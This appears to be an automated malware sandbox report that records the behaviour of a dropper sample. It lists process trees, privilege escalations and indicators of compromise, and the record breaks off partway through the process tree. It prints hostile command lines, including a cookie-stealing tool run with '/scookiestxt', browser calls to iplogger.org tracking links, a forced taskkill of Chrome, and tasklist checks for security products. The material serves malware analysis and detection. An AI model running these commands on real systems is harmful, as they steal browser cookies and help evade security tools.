pub2.exemsedge.exemsedge.exejfiag3g_gg.exepid process 1252 pub2.exe 1252 pub2.exe 1828 msedge.exe 1828 msedge.exe 1848 msedge.exe 1848 msedge.exe 3032 3032 3032 3032 3032 3032 3032 3032 5060 jfiag3g_gg.exe 5060 jfiag3g_gg.exe 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
pub2.exeLxjwaytgkwrfchptbandzip.exepid process 1252 pub2.exe 6912 Lxjwaytgkwrfchptbandzip.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
Processes:
msedge.exepid process 1848 msedge.exe 1848 msedge.exe 1848 msedge.exe 1848 msedge.exe 1848 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
KRSetp.exeInstallation.exetaskkill.exedescription pid process Token: SeDebugPrivilege 5004 KRSetp.exe Token: SeCreateTokenPrivilege 4932 Installation.exe Token: SeAssignPrimaryTokenPrivilege 4932 Installation.exe Token: SeLockMemoryPrivilege 4932 Installation.exe Token: SeIncreaseQuotaPrivilege 4932 Installation.exe Token: SeMachineAccountPrivilege 4932 Installation.exe Token: SeTcbPrivilege 4932 Installation.exe Token: SeSecurityPrivilege 4932 Installation.exe Token: SeTakeOwnershipPrivilege 4932 Installation.exe Token: SeLoadDriverPrivilege 4932 Installation.exe Token: SeSystemProfilePrivilege 4932 Installation.exe Token: SeSystemtimePrivilege 4932 Installation.exe Token: SeProfSingleProcessPrivilege 4932 Installation.exe Token: SeIncBasePriorityPrivilege 4932 Installation.exe Token: SeCreatePagefilePrivilege 4932 Installation.exe Token: SeCreatePermanentPrivilege 4932 Installation.exe Token: SeBackupPrivilege 4932 Installation.exe Token: SeRestorePrivilege 4932 Installation.exe Token: SeShutdownPrivilege 4932 Installation.exe Token: SeDebugPrivilege 4932 Installation.exe Token: SeAuditPrivilege 4932 Installation.exe Token: SeSystemEnvironmentPrivilege 4932 Installation.exe Token: SeChangeNotifyPrivilege 4932 Installation.exe Token: SeRemoteShutdownPrivilege 4932 Installation.exe Token: SeUndockPrivilege 4932 Installation.exe Token: SeSyncAgentPrivilege 4932 Installation.exe Token: SeEnableDelegationPrivilege 4932 Installation.exe Token: SeManageVolumePrivilege 4932 Installation.exe Token: SeImpersonatePrivilege 4932 Installation.exe Token: SeCreateGlobalPrivilege 4932 Installation.exe Token: 31 4932 Installation.exe Token: 32 4932 Installation.exe Token: 33 4932 Installation.exe Token: 34 4932 Installation.exe Token: 35 4932 Installation.exe Token: SeDebugPrivilege 1072 taskkill.exe Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 -
Suspicious use of FindShellTrayWindow 40 IoCs
Processes:
File.exemsedge.exeAccostarmi.exe.pifpid process 1964 File.exe 1964 File.exe 1964 File.exe 1964 File.exe 1964 File.exe 1964 File.exe 1964 File.exe 1964 File.exe 1848 msedge.exe 1964 File.exe 1964 File.exe 1848 msedge.exe 1964 File.exe 1964 File.exe 1964 File.exe 1964 File.exe 3032 1848 msedge.exe 1964 File.exe 1964 File.exe 1964 File.exe 1964 File.exe 1964 File.exe 3032 3032 3032 3032 3032 3032 224 Accostarmi.exe.pif 3032 3032 224 Accostarmi.exe.pif 224 Accostarmi.exe.pif 3032 3032 3032 3032 3032 3032 -
Suspicious use of SendNotifyMessage 22 IoCs
Processes:
File.exeAccostarmi.exe.pifpid process 1964 File.exe 1964 File.exe 1964 File.exe 1964 File.exe 1964 File.exe 1964 File.exe 1964 File.exe 1964 File.exe 1964 File.exe 1964 File.exe 1964 File.exe 1964 File.exe 1964 File.exe 1964 File.exe 1964 File.exe 1964 File.exe 1964 File.exe 1964 File.exe 1964 File.exe 224 Accostarmi.exe.pif 224 Accostarmi.exe.pif 224 Accostarmi.exe.pif -
Suspicious use of SetWindowsHookEx 27 IoCs
Processes:
Info.exeLuC7opz56ZHv9DMKAzniWXla.exeGzkt5mHpxF1v1F6ko7n6Ojln.exe8yNuAlksxt9ERCQBLnTf5R7s.exe3C5chxgmdIM7FCOvWctXQCVO.exepowershell.EXEQwtjZdfAu0PgtINFi4Nvj66n.exeOXTwCzYYERQoTolMsvuosWem.exeHxMqtYZIUVTsFBvCoEA3Pki_.exek3wOXzGlwzQprfZ7dKwqK6sN.exezhD7lRTUvJmwo8erfpdnVTWv.exethSjL5N0VAxIgAXhHP6f09aM.exefind.exeAMmh7Hp1kuB7JaUBXLLtucDo.exePGrgYrmjIUuPTUnxq9jnhp_9.exez63VCPkRi8gB3YlO5uw17UaM.exe4E1sEd5y60BTJLCX9pPJHvn6.exeAppLaunch.exeInstall.exezhD7lRTUvJmwo8erfpdnVTWv.exeInstall.exedada.exedada.exebuild.exebuild.exebkkimcju.exeAccostarmi.exe.pifpid process 4708 Info.exe 5148 LuC7opz56ZHv9DMKAzniWXla.exe 5252 Gzkt5mHpxF1v1F6ko7n6Ojln.exe 5316 8yNuAlksxt9ERCQBLnTf5R7s.exe 5408 3C5chxgmdIM7FCOvWctXQCVO.exe 5308 powershell.EXE 5600 QwtjZdfAu0PgtINFi4Nvj66n.exe 5704 OXTwCzYYERQoTolMsvuosWem.exe 5512 HxMqtYZIUVTsFBvCoEA3Pki_.exe 5688 k3wOXzGlwzQprfZ7dKwqK6sN.exe 5672 zhD7lRTUvJmwo8erfpdnVTWv.exe 5548 thSjL5N0VAxIgAXhHP6f09aM.exe 5532 find.exe 5648 AMmh7Hp1kuB7JaUBXLLtucDo.exe 5520 PGrgYrmjIUuPTUnxq9jnhp_9.exe 5720 z63VCPkRi8gB3YlO5uw17UaM.exe 5680 4E1sEd5y60BTJLCX9pPJHvn6.exe 6380 AppLaunch.exe 6264 Install.exe 6400 zhD7lRTUvJmwo8erfpdnVTWv.exe 5188 Install.exe 6140 dada.exe 5832 dada.exe 2328 build.exe 2456 build.exe 5208 bkkimcju.exe 224 Accostarmi.exe.pif -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exeFiles.exemsedge.exepzyh.exeInstallation.exedescription pid process target process PID 1852 wrote to memory of 2556 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe Files.exe PID 1852 wrote to memory of 2556 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe Files.exe PID 1852 wrote to memory of 2556 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe Files.exe PID 1852 wrote to memory of 3320 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe Install.exe PID 1852 wrote to memory of 3320 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe Install.exe PID 1852 wrote to memory of 3320 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe Install.exe PID 1852 wrote to memory of 5004 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe KRSetp.exe PID 1852 wrote to memory of 5004 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe KRSetp.exe PID 1852 wrote to memory of 4468 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe jg3_3uag.exe PID 1852 wrote to memory of 4468 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe jg3_3uag.exe PID 1852 wrote to memory of 4468 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe jg3_3uag.exe PID 2556 wrote to memory of 1964 2556 Files.exe File.exe PID 2556 wrote to memory of 1964 2556 Files.exe File.exe PID 2556 wrote to memory of 1964 2556 Files.exe File.exe PID 1852 wrote to memory of 1848 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe msedge.exe PID 1852 wrote to memory of 1848 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe msedge.exe PID 1848 wrote to memory of 1404 1848 msedge.exe msedge.exe PID 1848 wrote to memory of 1404 1848 msedge.exe msedge.exe PID 1852 wrote to memory of 1880 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe Folder.exe PID 1852 wrote to memory of 1880 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe Folder.exe PID 1852 wrote to memory of 1880 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe Folder.exe PID 1852 wrote to memory of 4932 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe Installation.exe PID 1852 wrote to memory of 4932 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe Installation.exe PID 1852 wrote to memory of 4932 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe Installation.exe PID 1852 wrote to memory of 4864 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe pzyh.exe PID 1852 wrote to memory of 4864 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe pzyh.exe PID 1852 wrote to memory of 4864 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe pzyh.exe PID 1852 wrote to memory of 1252 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe pub2.exe PID 1852 wrote to memory of 1252 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe pub2.exe PID 1852 wrote to memory of 1252 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe pub2.exe PID 1852 wrote to memory of 4708 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe Info.exe PID 1852 wrote to memory of 4708 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe Info.exe PID 1852 wrote to memory of 4708 1852 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe Info.exe PID 4864 wrote to memory of 3364 4864 pzyh.exe jfiag3g_gg.exe PID 4864 wrote to memory of 3364 4864 pzyh.exe jfiag3g_gg.exe PID 4864 wrote to memory of 3364 4864 pzyh.exe jfiag3g_gg.exe PID 4932 wrote to memory of 4152 4932 Installation.exe cmd.exe PID 4932 wrote to memory of 4152 4932 Installation.exe cmd.exe PID 4932 wrote to memory of 4152 4932 Installation.exe cmd.exe PID 1848 wrote to memory of 4588 1848 msedge.exe msedge.exe PID 1848 wrote to memory of 4588 1848 msedge.exe msedge.exe PID 1848 wrote to memory of 4588 1848 msedge.exe msedge.exe PID 1848 wrote to memory of 4588 1848 msedge.exe msedge.exe PID 1848 wrote to memory of 4588 1848 msedge.exe msedge.exe PID 1848 wrote to memory of 4588 1848 msedge.exe msedge.exe PID 1848 wrote to memory of 4588 1848 msedge.exe msedge.exe PID 1848 wrote to memory of 4588 1848 msedge.exe msedge.exe PID 1848 wrote to memory of 4588 1848 msedge.exe msedge.exe PID 1848 wrote to memory of 4588 1848 msedge.exe msedge.exe PID 1848 wrote to memory of 4588 1848 msedge.exe msedge.exe PID 1848 wrote to memory of 4588 1848 msedge.exe msedge.exe PID 1848 wrote to memory of 4588 1848 msedge.exe msedge.exe PID 1848 wrote to memory of 4588 1848 msedge.exe msedge.exe PID 1848 wrote to memory of 4588 1848 msedge.exe msedge.exe PID 1848 wrote to memory of 4588 1848 msedge.exe msedge.exe PID 1848 wrote to memory of 4588 1848 msedge.exe msedge.exe PID 1848 wrote to memory of 4588 1848 msedge.exe msedge.exe PID 1848 wrote to memory of 4588 1848 msedge.exe msedge.exe PID 1848 wrote to memory of 4588 1848 msedge.exe msedge.exe PID 1848 wrote to memory of 4588 1848 msedge.exe msedge.exe PID 1848 wrote to memory of 4588 1848 msedge.exe msedge.exe PID 1848 wrote to memory of 4588 1848 msedge.exe msedge.exe PID 1848 wrote to memory of 4588 1848 msedge.exe msedge.exe PID 1848 wrote to memory of 4588 1848 msedge.exe msedge.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe"C:\Users\Admin\AppData\Local\Temp\7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files.exe"C:\Users\Admin\AppData\Local\Temp\Files.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Rxji73⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe63fa46f8,0x7ffe63fa4708,0x7ffe63fa47184⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 6243⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 6443⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 6523⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 7483⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 8203⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 10203⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 10363⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 13563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 6323⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 18523⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe"C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij72⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe63fa46f8,0x7ffe63fa4708,0x7ffe63fa47183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2668 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5288 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3840 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3780 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x228,0x22c,0x230,0x1fc,0x234,0x7ff621275460,0x7ff621275470,0x7ff6212754804⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3780 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,11141644064019444893,15341445896857796746,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3424 /prefetch:23⤵
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
-
C:\Windows\SysWOW64\rUNdlL32.eXe"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub3⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3340 -s 6084⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Installation.exe"C:\Users\Admin\AppData\Local\Temp\Installation.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\pzyh.exe"C:\Users\Admin\AppData\Local\Temp\pzyh.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\pub2.exe"C:\Users\Admin\AppData\Local\Temp\pub2.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\Info.exe"C:\Users\Admin\AppData\Local\Temp\Info.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\LuC7opz56ZHv9DMKAzniWXla.exe"C:\Users\Admin\Documents\LuC7opz56ZHv9DMKAzniWXla.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\RxWV8a03ZV04XB88tc2CXbRj.exe"C:\Users\Admin\Documents\RxWV8a03ZV04XB88tc2CXbRj.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\dada.exe"C:\Users\Admin\AppData\Local\Temp\dada.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\RK_4rgTt5CcW3iNxDT6xO9bL.exe"C:\Users\Admin\Documents\RK_4rgTt5CcW3iNxDT6xO9bL.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\34f5381b-d2d7-48b4-8af3-8b6f13b8fbaf.exe"C:\Users\Admin\AppData\Local\Temp\34f5381b-d2d7-48b4-8af3-8b6f13b8fbaf.exe"4⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Users\Admin\Documents\Gzkt5mHpxF1v1F6ko7n6Ojln.exe"C:\Users\Admin\Documents\Gzkt5mHpxF1v1F6ko7n6Ojln.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif4⤵
-
C:\Windows\SysWOW64\cmd.execmd5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq BullGuardCore.exe"6⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "bullguardcore.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"6⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"6⤵
-
